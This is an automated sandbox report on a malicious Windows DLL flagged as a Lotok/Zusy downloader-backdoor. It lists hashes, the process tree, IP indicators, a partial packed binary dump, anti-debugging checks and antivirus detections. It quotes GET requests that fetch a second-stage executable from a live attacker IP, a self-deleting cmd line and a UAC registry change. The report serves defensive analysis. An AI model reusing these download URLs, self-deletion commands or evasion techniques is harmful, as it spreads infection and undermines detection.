Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 6, 2023, 9:45 a.m.	Nov. 6, 2023, 9:47 a.m.

Size	73.5KB
Type	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5	`802cf804f8e94474c805d2fba97c2f41`
SHA256	`f112fdb86d608028f0018a03725b9b865e90bbb3f27d3427178935545cbc9d0e`
CRC32	`6F1F1F60`
ssdeep	`1536:awsdCFnE4Nz1/SXPtpoprAeDYxUfGKhK5O:awsAik1a4pGKhK5O`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsDLL - (no description) IsPE32 - (no description)

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\d-7.dll,Edge
2660
- CNHFzqf.exe "C:\ProgramData\NPQsGdj8f\CNHFzqf.exe"
  2876
  - cmd.exe cmd /c echo.>c:\xxxx.ini
    2976
  - cmd.exe C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\PROGRA~3\NPQSGD~1\CNHFzqf.exe > nul
    1964
    - PING.EXE ping -n 2 127.0.0.1
      2212
  - cmd.exe cmd /c echo.>c:\del & exit
    2116
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\d-7.dll,
2744

Name	Response	Post-Analysis Lookup
feetifu.net

IP Address	Status	Action
164.124.101.2	Active	Moloch
202.79.173.167	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 202.79.173.167:8000 -> 192.168.56.101:49163	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 202.79.173.167:8000 -> 192.168.56.101:49163	2023711	ET MALWARE JS/WSF Downloader Dec 08 2016 M7	A Network Trojan was detected
TCP 202.79.173.167:8000 -> 192.168.56.101:49163	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 202.79.173.167:8000 -> 192.168.56.101:49163	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 202.79.173.167:8000 -> 192.168.56.101:49163	2014520	ET INFO EXE - Served Attached HTTP	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Nov. 6, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 6, 2023, 9:45 a.m.			0	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 6, 2023, 9:45 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://202.79.173.167:8000/1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://202.79.173.167:8000/2
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://202.79.173.167:8000/3
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://202.79.173.167:8000/4

Performs some HTTP requests (4 events)

request	GET http://202.79.173.167:8000/1
request	GET http://202.79.173.167:8000/2
request	GET http://202.79.173.167:8000/3
request	GET http://202.79.173.167:8000/4

Allocates read-write-execute memory (usually to unpack itself) (16 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bfe000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75d41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75e61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76161000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x764b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73660000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73571000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734a4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73572000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76281000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75bc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75d21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2876 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73572000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2876 region_size: 94208 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\ProgramData\NPQsGdj8f\CNHFzqf.exe
file	C:\ProgramData\NPQsGdj8f\C12go.exe

Creates a suspicious process (1 event)

cmdline

C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\PROGRA~3\NPQSGD~1\CNHFzqf.exe > nul

Drops a binary and executes it (1 event)

file	C:\ProgramData\NPQsGdj8f\CNHFzqf.exe

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (38 events)

Time & API	Arguments	Status	Return
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000104 process_name: mobsync.exe process_identifier: 2276	1	1
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000104 process_name: taskhost.exe process_identifier: 2480	1	1
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000104 process_name: rundll32.exe process_identifier: 2660	1	1
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000001f8 process_name: CNHFzqf.exe process_identifier: 6619244		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x0000037c process_name: CNHFzqf.exe process_identifier: 6815811		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000388 process_name: CNHFzqf.exe process_identifier: 7340153		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x0000038c process_name: CNHFzqf.exe process_identifier: 7274610		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000390 process_name: CNHFzqf.exe process_identifier: 7602224		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000394 process_name: CNHFzqf.exe process_identifier: 7536688		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000398 process_name: CNHFzqf.exe process_identifier: 3014768		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x0000039c process_name: CNHFzqf.exe process_identifier: 7274573		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003a0 process_name: CNHFzqf.exe process_identifier: 5046390		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003a4 process_name: CNHFzqf.exe process_identifier: 6815859		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003a8 process_name: CNHFzqf.exe process_identifier: 6881397		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003ac process_name: CNHFzqf.exe process_identifier: 7602277		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003b0 process_name: CNHFzqf.exe process_identifier: 6619235		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003b4 process_name: CNHFzqf.exe process_identifier: 4456552		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003b8 process_name: CNHFzqf.exe process_identifier: 7536758		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003c0 process_name: CNHFzqf.exe process_identifier: 6684769		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003c4 process_name: CNHFzqf.exe process_identifier: 7536752		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003c8 process_name: CNHFzqf.exe process_identifier: 7602275		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003cc process_name: CNHFzqf.exe process_identifier: 7536761		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003d0 process_name: CNHFzqf.exe process_identifier: 4390992		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003d4 process_name: process_identifier: 5439572		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003d8 process_name: CNHFzqf.exe process_identifier: 6553715		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003dc process_name: CNHFzqf.exe process_identifier: 5046338		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003e0 process_name: CNHFzqf.exe process_identifier: 6619246		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003e4 process_name: CNHFzqf.exe process_identifier: 6750273		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003e8 process_name: CNHFzqf.exe process_identifier: 7471220		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003ec process_name: CNHFzqf.exe process_identifier: 7733331		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003f0 process_name: CNHFzqf.exe process_identifier: 4980808		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003f4 process_name: CNHFzqf.exe process_identifier: 6619251		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003f8 process_name: CNHFzqf.exe process_identifier: 7340109		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003fc process_name: CNHFzqf.exe process_identifier: 7864421		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000404 process_name: CNHFzqf.exe process_identifier: 3342387		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000408 process_name: CNHFzqf.exe process_identifier: 3014722		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x0000040c process_name: process_identifier: 7733362		0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000410 process_name: CNHFzqf.exe process_identifier: 6553705		0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 2876 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 155648 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x10001000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process rundll32.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Nov. 6, 2023, 9:45 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTàà@P 0>` @@Ào$uÄ@$5pUPX0P àUPX1à` à@à.rsrc@@:ä@À3.91UPX! QµÙä½ª&ÞÀ&/ÿÿÿÿÁL$HÿHÇ4hNÂVñè/.öDï¾¿ý$tVASYÆ^6ÇIÃÿqûÿýÿt$PÂ¸lMT ß@ìmÿ·ÿMèÿSVW}9}eðuìsWûÿîßYEMÜÛMeüWÆEü¨ooíu4~üÿØ<BÿvÔÎSoßm1)]F¤ü;ßtý=¸µ6I4Yô_^d Z»öÿ÷Ð[ÉÂEäèHêàìw Ö¥¿7jjmSð_¸Ô4yùlí{Á3ÛLÔ]üTEñÀIáíwy^¡<ðQÐRÌÿ¾T§<í&S:ÐÐÀ^È¿»öûP/EÀzPj ô4ëGÀuiØvÌMCäxÿhdjÿQÏbîap/âøÇt8\|³ûIÊßN¦H9¼FFu-Áó0Çì£mù·Eè3ÛSSßýçé¹ :Rh/@+{ÿþàYÃö,u KFÃ>r¥û U_¹(Lhord@(ù±èr³`Äl<HFUìw<üTFh1¢ðYÞAÑöf¾¦{Å ¶Vfííÿ\Äë3özô3Àü¿0ýÿÏÈÀøÁá3ÒòÙ#÷#ß3óðãß¾æÒ3U^ÑâÑáÿMøuüa7Üâ@=tZ¬\|ÄÚC`ñáØ¯é;xÈ%uçÿ \$ðöYt!ÀFp/stàÛÿàvÀDøjÊ^öÁªÑé3ËØàoúBéNuÂBÇú9\|ÝÁ U6,Î(èQOÍñÑj8ðè>uçÎÓf8 d3;fÖÂÖkÈãÉ#@éÍ^U L¬pü¿ÙA\|ÐHÒt,Q@SWØý»à&\¶pçÿ¤3ûFÁè¯£3¼&<º3Ç®cuö[D^¦Óu«]XÈ¤Pvx-Út¢°PáBäFrÉ÷uí^ÃE°ï×b´W"3ÿLÊÃ9Æ VdÌÎÄðÚ¼ +ëº@¦Àtå7XÉ)ä³k©üMðT!T_ Á]éÃ¸À¸ kÓÁ½ãkú>+u,ÇF,äb\|·¦iZ8<40@D 4MÓHLPTX(íTÚÔ,¡Üâîò;÷8tzàÚµ[¾ ®Ð3\|LÎ´¦óàO`Hjë.-¶9F(^À²ü@mæ2ÃÁî¼89_üì^8tòZx;ûmÜ9_,o®´Û\|.Hu0Lu4÷¿ÖF´TJG4;Ã\|e+àÛt`Xt[P¶@Ïðnhí9W8(&Ppþuÿ?{»ÂT²ÿO4$(} è(\|Åjú Wwöaðsì1s{ÚÅ3Ö,MÌHtH @äÈð:@ÝOåvÕ,,ø\|Ê·Ü,ÿë§ð0^"¸Läu¦\.I00Ô00'Çä4;ÿ.oN³þÿÿªX¡ÈáÉèGeépSEèÑèÔñBhVWÝ·M+38N, 9FðhÂÁÿ9Xøu hÈóPç"Woø5ûSÖ¦ð-#ëqA£æa5EàPÒª}÷ð¢QãÕÿ5Èl½òNr&ìQ;ÿ0À-~^"ái`;çæîG¬}àaëÍN(F«¥'¶pF52À.t% ÙÒs0Ìüðõ¸XÆ6PrÊ>\|:uã_K¡~SÕÉ´ ¶¦\Q®Ã×v&ìäÀà¾pÉ~Si¡Àù';÷#Ä' 0j8Ý_Ñ~¯Èè;Ï}üt â-0Âðäâ8E»RÙ +OIÅ_´T9xøtbè¹Ê3ðNäë»<7åèWWSüh?é.i))ÁApmj #êºýø óªìë>9}Vþ_özÂuÓxN9{Pu~,¿"Ó0o8÷HàèÝF,H%4?GðÌÅ?q× ì$ÀÂtZÿ0\|à öì8pêÒQ¹þhbëaYßGá'Æz`w"üÍ°NÉtÎvpà¼ÂñÎVð3±S[ÅíVQW¢;Ç4VÐZâøJÄ¶md×+Ý_úþªvjèñ¾÷Ð¨t!oÔÂAµÙ.t<¢ `ªðP£½ãÅ¿ßëì;¶pHôSX® ±ClÎK íuç[Ä]ÅNQd@¤mä+Â¿«ö(Xôu/jFL+½üü¸ÀIIDô\|AVÐþÒöèIuòhjßÁûÀ"GãFíÿFG#[\|íð,6>QÿI6dAÎ·$ù4ÃmÎ6Qk0ÕD6ó$iëT lz\ô¯F4 X8ÿE c]`)ãÕÎrÛoÓ¬áL,&ãÆÈ£åDå'Ãg -8L+îÍIËYºBhø3Û .ÀïPüPSV5D`T+ñ_È]øÜ5`ÌÿÖ¯À¸XBÿh]ÛäaD=êzus9]^nPüÝ¡B?Lá;Ã@ôWÑíÚÝ²µFô°«à]`«IrÔ;ótõ¿Á]¸ÏFO8_8ÿwOðCÅëÓß+>´0ë S±8ãSà3ÀTþ7,f´øþt);Ft$ \|Ô¹Þ"(îh`0P[>=âxçþvÊ OøÿN£Îmjÿj-®e6$¤í`-×ñ2M(Vï.H$>ô7®v,êÿ7ÃÁà3íÖÐ (#Ç$C;VrÆñ¤Ô]ùg+8 @·ðX;\ »ÏßÛcøÁ`zÇ@(ÇÛ·Ý<j'Ilù\| èçöÍc%tatO~f<~;[nwéu\$ù Xù~ûìJÿ¾É¶\|3ÓÉ¾Oÿ+*ë&.Ðùú§½ãíëfëâ×Y®ù¿wò:étIuÀ7ÁÝ0ÇäïtM¸irE¯Ãð¸nSUe¤p³jÓU~ k~<ïØÄj Ü\$ ..Ç=öéè²0n]^h\|Ñî »©Sú,zÆFm¶mÕ\ ¶.^,_:`/~,l®LdP×PU±MÑì\^øS+Ë$Ë_¹$`(@_©FÒÆ@ j[¿¥¸^0ªÏ¸7nwäãJMò<è]p ßo×e(Výå©Hæ$RtÕ ëG¬ g¡3îÕh0¦+r_w@¢láH<µA¦À°jëèîNªÝ5û^M°{pÝBü¾U->ý)@îDïS]ÄèltWu=?V6] ÃR:[;¾ýÿtMè#t?jY+Át/tHHdHuÃ°ãgNG`Jf@û¾4]ÇF^ëuË«¼Ï ëi`:ÛkÏí_ëW<tH;/"u åý8EÛt b WyÿÉ&^ë((ÿyL±\F èÀíE}<[¦_ ÿÂA;þ]ÑVVC§uÝh¹r&á©£ request_handle: 0x00cc000c	1	1	0

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 out of 96 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000288 process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000288 process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000002a4 process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000002a4 process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000374 process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000374 process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000001f8 process_name: CNHFzqf.exe process_identifier: 6619244		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x0000037c process_name: CNHFzqf.exe process_identifier: 6815811		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000388 process_name: CNHFzqf.exe process_identifier: 7340153		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x0000038c process_name: CNHFzqf.exe process_identifier: 7274610		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000390 process_name: CNHFzqf.exe process_identifier: 7602224		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000394 process_name: CNHFzqf.exe process_identifier: 7536688		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000398 process_name: CNHFzqf.exe process_identifier: 3014768		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x0000039c process_name: CNHFzqf.exe process_identifier: 7274573		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003a0 process_name: CNHFzqf.exe process_identifier: 5046390		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003a4 process_name: CNHFzqf.exe process_identifier: 6815859		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003a8 process_name: CNHFzqf.exe process_identifier: 6881397		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003ac process_name: CNHFzqf.exe process_identifier: 7602277		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003b0 process_name: CNHFzqf.exe process_identifier: 6619235		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003b4 process_name: CNHFzqf.exe process_identifier: 4456552		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003b8 process_name: CNHFzqf.exe process_identifier: 7536758		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003bc process_name: CNHFzqf.exe process_identifier: 7602277		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003c0 process_name: CNHFzqf.exe process_identifier: 6684769		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003c4 process_name: CNHFzqf.exe process_identifier: 7536752		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003c8 process_name: CNHFzqf.exe process_identifier: 7602275		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003cc process_name: CNHFzqf.exe process_identifier: 7536761		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003d0 process_name: CNHFzqf.exe process_identifier: 4390992		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003d4 process_name: process_identifier: 5439572		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003d8 process_name: CNHFzqf.exe process_identifier: 6553715		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003dc process_name: CNHFzqf.exe process_identifier: 5046338		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003e0 process_name: CNHFzqf.exe process_identifier: 6619246		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003e4 process_name: CNHFzqf.exe process_identifier: 6750273		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003e8 process_name: CNHFzqf.exe process_identifier: 7471220		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003ec process_name: CNHFzqf.exe process_identifier: 7733331		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003f0 process_name: CNHFzqf.exe process_identifier: 4980808		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003f4 process_name: CNHFzqf.exe process_identifier: 6619251		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003f8 process_name: CNHFzqf.exe process_identifier: 7340109		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x000003fc process_name: CNHFzqf.exe process_identifier: 7864421		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000404 process_name: CNHFzqf.exe process_identifier: 3342387		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000408 process_name: CNHFzqf.exe process_identifier: 3014722		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x0000040c process_name: process_identifier: 7733362		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000410 process_name: CNHFzqf.exe process_identifier: 6553705		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x0000041c process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x0000041c process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000418 process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000418 process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000338 process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000338 process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000338 process_name: CNHFzqf.exe process_identifier: 2876		0	0
Process32NextW Nov. 6, 2023, 9:45 a.m.	snapshot_handle: 0x00000338 process_name: CNHFzqf.exe process_identifier: 2876		0	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	ping -n 2 127.0.0.1
cmdline	cmd /c echo.>c:\del & exit
cmdline	C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\PROGRA~3\NPQSGD~1\CNHFzqf.exe > nul

Communicates with host for which no DNS query was performed (1 event)

host

202.79.173.167

Attempts to modify UAC prompt behavior (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2876 resumed a thread in remote process 1964
NtResumeThread Nov. 6, 2023, 9:45 a.m.	thread_handle: 0x00000418 suspend_count: 1 process_identifier: 1964	1	0	0

File has been identified by 37 AntiVirus engines on VirusTotal as malicious (37 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.BadUpdate.b!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Zusy.501719
FireEye	Generic.mg.802cf804f8e94474
Skyhigh	BehavesLike.Win32.NetLoader.lh
ALYac	Gen:Variant.Zusy.501719
Malwarebytes	Backdoor.Lotok
VIPRE	Gen:Variant.Zusy.501719
Sangfor	Trojan.Win32.Zusy.Vv4c
CrowdStrike	win/malicious_confidence_90% (W)
BitDefender	Gen:Variant.Zusy.501719
K7GW	Riskware ( 0040eff71 )
K7AntiVirus	Riskware ( 0040eff71 )
Arcabit	Trojan.Zusy.D7A7D7
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/TrojanDownloader.Agent.HHI
APEX	Malicious
Cynet	Malicious (score: 99)
Kaspersky	Backdoor.Win32.Lotok.sge
Alibaba	Backdoor:Win32/Lotok.9e4512a1
